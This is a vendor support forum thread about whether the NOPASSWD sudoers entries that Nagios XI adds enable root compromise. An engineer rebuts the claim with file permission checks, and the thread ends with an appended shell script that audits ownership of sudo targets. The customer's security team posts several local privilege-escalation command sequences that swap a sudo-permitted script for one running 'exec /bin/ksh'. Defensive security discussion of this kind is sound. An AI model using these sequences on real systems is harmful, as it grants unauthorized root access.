Nagios XI - sudoers Problem
Hi There,
We are currently trying to implement Nagios into our environment.
Our IT Security is not approving it due to lines like the below being put into the /etc/sudoers file during the installation.
This is apparently root compromise.
Could someone shed some light on this or a workaround?
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/components/getprofile.sh
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/upgrade_to_latest.sh
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/change_timezone.sh
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/manage_services.sh *
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/reset_config_perms.sh
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/manage_ssl_config.sh *
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/backup_xi.sh *
scottwilkerson (DevOps Engineer, Nagios Enterprises)
Re: Nagios XI - sudoers Problem
These are required for the nagios user to run some essential scripts on the Nagios XI server and there isn't any work around.
Can they give any example of how this is root compromised?
We take security very seriously and if there is in fact a root compromise we would address that issue.
Re: Nagios XI - sudoers Problem
Good Day Scott,
Thank you for your response,
I am pasting below the exact response that our IT Security provided to me.
---------------------------------------------------------------------------------------------
OK if the sudo were permitted then here is how you can get full root access.
Three Quick and easy root access …….
Here is how you as a Nagios user can become full root totally undocumented.
$ cd /usr/local/nagiosxi/scripts
$ mv change_timezone.sh change_timezone.sh_orig
$ echo “exec /bin/ksh” > change_timezone.sh
$ chmod 755 change_timezone.sh
$ sudo /usr/local/nagiosxi/scripts/change_timezone.sh
#
OR
$ cp /etc/init.d/npcd $HOME/init.d_npcd
$ echo “exec /bin/ksh” > /etc/init.d/npcd Or $ echo “exec /bin/ksh” >> /etc/init.d/npcd
$ sudo /etc/init.d/npcd
#
OR
$ cd /usr/local/nagiosxi/
$ mv html html_orig
$ mkdir -p html/includes/components/profile
$ echo “exec /bin/ksh” > html/includes/components/profile/getprofile.sh
$ chmod 755 html/includes/components/profile/getprofile.sh
$ sudo /usr/local/nagiosxi/html/includes/components/profile/getprofile.sh
#
Now the reason why is that the Nagios user owns the directory structure and can write to / overwrite the files / directories.
The owner of the directory structure is not restricted to root only with only root having write access……. And one of the scripts does change the ownership and permissions of these structures.
The following commands are not totally owned by root and thus permitting them to run as root will lead to a root compromise.
Linux psbsamon01v.standardbank.co.za 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
drwxr-xr-x. 91 root root 8192 Mar 28 07:34 /etc
lrwxrwxrwx. 1 root root 11 Aug 16 2018 /etc/init.d -> rc.d/init.d
-rwxr-xr-x 1 nagios nagios 2110 Feb 19 18:38 /etc/init.d/npcd
drwxr-xr-x. 14 root root 168 Aug 16 2018 /usr
-rwxr-xr-x. 1 root root 4618216 Jun 19 2018 /usr/bin/php
drwxr-xr-x. 18 root root 219 Mar 6 15:05 /usr/local
drwxr-xr-x 10 nagios nagios 102 Mar 6 15:05 /usr/local/nagiosxi
-rw-r--r-- 1 root nagios 173073 Mar 6 15:05 /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
-rwxr-xr-x 1 root nagios 13061 Mar 6 15:05 /usr/local/nagiosxi/html/includes/components/profile/getprofile.sh
drwxr-xr-x 3 nagios nagios 4096 Mar 28 08:19 /usr/local/nagiosxi/scripts
-rwxr-xr-x 1 root nagios 7625 Mar 6 15:05 /usr/local/nagiosxi/scripts/backup_xi.sh
-rwxr-xr-x 1 root nagios 1800 Mar 6 15:05 /usr/local/nagiosxi/scripts/change_timezone.sh
-rwxr-xr-x 1 root nagios 2634 Mar 6 15:05 /usr/local/nagiosxi/scripts/manage_services.sh
-rwxr-xr-x 1 root nagios 3815 Mar 6 15:05 /usr/local/nagiosxi/scripts/manage_ssl_config.sh
-rwxr-xr-x 1 root nagios 1688 Mar 6 15:05 /usr/local/nagiosxi/scripts/repair_databases.sh
-rwxr-xr-x 1 root nagios 3604 Mar 6 15:05 /usr/local/nagiosxi/scripts/reset_config_perms.sh
-rwxr-xr-x 1 root nagios 2914 Mar 6 15:05 /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
----------------------------------------------------------------------------------------------------------------
scottwilkerson (DevOps Engineer, Nagios Enterprises)
Re: Nagios XI - sudoers Problem
What version of XI are you running? I believe these were fixed in the current version
# cd /usr/local/nagiosxi/scripts/
[root@localhost scripts]# ll change_timezone.sh
-r-xr-x--- 1 root nagios 1800 Apr 30 09:24 change_timezone.sh
[root@localhost scripts]# su nagios
[nagios@localhost scripts]$ mv change_timezone.sh change_timezone.sh_orig
mv: cannot move `change_timezone.sh' to `change_timezone.sh_orig': Permission denied
[nagios@localhost scripts]$ echo “exec /bin/ksh” > change_timezone.sh
bash: change_timezone.sh: Permission denied
[nagios@localhost scripts]$ echo “exec /bin/ksh” > /etc/init.d/npcd
bash: /etc/init.d/npcd: Permission denied
[nagios@localhost scripts]$
Re: Nagios XI - sudoers Problem
We Installed version 5.6.1.
Could you maybe give me a short briefing on what I can provide to my IT Security team to relook this, please?
Thanks in advance.
scottwilkerson (DevOps Engineer, Nagios Enterprises)
Re: Nagios XI - sudoers Problem
Well for one example, per the info you gave above /usr/local/nagiosxi/scripts/change_timezone.sh is only writable by root, so you would already need to be root to perform the commands you mentioned.
Re: Nagios XI - sudoers Problem
The response from our IT Security:
The risk is /usr/local/nagiosxi is not owned by root and nagios can change / modify any of the files / folders in this directory, thus nothing in or below this directory will be catered to run as root.
scottwilkerson (DevOps Engineer, Nagios Enterprises)
Re: Nagios XI - sudoers Problem
The permissions on /usr/local/nagiosxi/scripts/change_timezone.sh are
-rwxr-xr-x 1 root nagios 1800 Mar 6 15:05 /usr/local/nagiosxi/scripts/change_timezone.sh
This makes it such that the nagios user can execute the script but cannot modify it or move it
# su nagios
# mv /usr/local/nagiosxi/scripts/change_timezone.sh /usr/local/nagiosxi/scripts/change_timezone.sh_move
mv: cannot move `/usr/local/nagiosxi/scripts/change_timezone.sh' to `/usr/local/nagiosxi/scripts/change_timezone.sh_move': Permission denied
Re: Nagios XI - sudoers Problem
If you own the directory above any script you can move the directory out and replace it with your own and your own permissions.
$ cd /usr/local/nagiosxi/
$ mv scripts scripts_orig
$ mkdir -p scripts
$ echo “exec /bin/ksh” > scripts/change_timezone.sh
$ chmod 755 scripts/change_timezone.sh
$ sudo /usr/local/nagiosxi/scripts/change_timezone.sh
#
scottwilkerson (DevOps Engineer, Nagios Enterprises)
Re: Nagios XI - sudoers Problem
But you don't
ls -dl /usr/local/nagiosxi/
drwxr-xr-x 10 root nagios 4096 Jan 9 2012 /usr/local/nagiosxi/
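As an added defender-side check (not from the thread, and not Nagios code), here is a shell audit that applies the point both sides of this thread converge on: a sudo NOPASSWD target is only as trusted as the file itself and every directory above it, so each component must be root-owned and neither group- nor world-writable. It assumes GNU stat (Linux) and sudoers lines in the NOPASSWD: form shown in the first post; the owner-uid and top-directory arguments exist so the check can also be run against a constructed tree.

```shell
#!/bin/sh
# Audit sudoers NOPASSWD targets. For each command path, walk from the file up to
# TOP (default /) and require every component to be owned by OWNER_UID (default 0,
# i.e. root) and to be neither group- nor world-writable. Assumes GNU stat.

# check_sudo_target PATH [OWNER_UID] [TOP]
# Prints the first untrusted component and returns 1; returns 0 if the chain is clean.
check_sudo_target() {
    p=$1; want=${2:-0}; top=${3:-/}
    [ -e "$p" ] || { echo "MISSING $p"; return 1; }
    while :; do
        uid=$(stat -c '%u' "$p") || return 1
        mode=$(stat -c '%a' "$p") || return 1     # e.g. 755, 2775, 4755
        if [ "$uid" != "$want" ]; then
            echo "BAD-OWNER uid=$uid $p"; return 1
        fi
        # 022 (octal) = group-write | other-write; a writable parent lets the
        # unprivileged owner replace the script (the "mv scripts scripts_orig" case)
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            echo "WRITABLE mode=$mode $p"; return 1
        fi
        if [ "$p" = "$top" ] || [ "$p" = "/" ]; then
            return 0
        fi
        p=$(dirname "$p")
    done
}

# check_sudoers_file FILE [OWNER_UID] [TOP]
# Extracts the command from every "... NOPASSWD:/path [args]" line and checks it.
# Returns the number of failing entries (0 means every target is trusted).
check_sudoers_file() {
    f=$1; want=${2:-0}; top=${3:-/}; bad=0
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in *NOPASSWD:*) ;; *) continue ;; esac
        cmd=${line#*NOPASSWD:}      # drop the "USER HOST = NOPASSWD:" prefix
        cmd=${cmd%% *}              # drop trailing arguments such as " *"
        if check_sudo_target "$cmd" "$want" "$top"; then
            echo "OK $cmd"
        else
            bad=$((bad + 1))
        fi
    done < "$f"
    return "$bad"
}
```

Run it as `check_sudoers_file /etc/sudoers.d/nagiosxi` (or whichever file carries the NAGIOSXI lines) and treat any BAD-OWNER or WRITABLE line as a finding to fix with chown root and chmod before the sudo rule is allowed to stand.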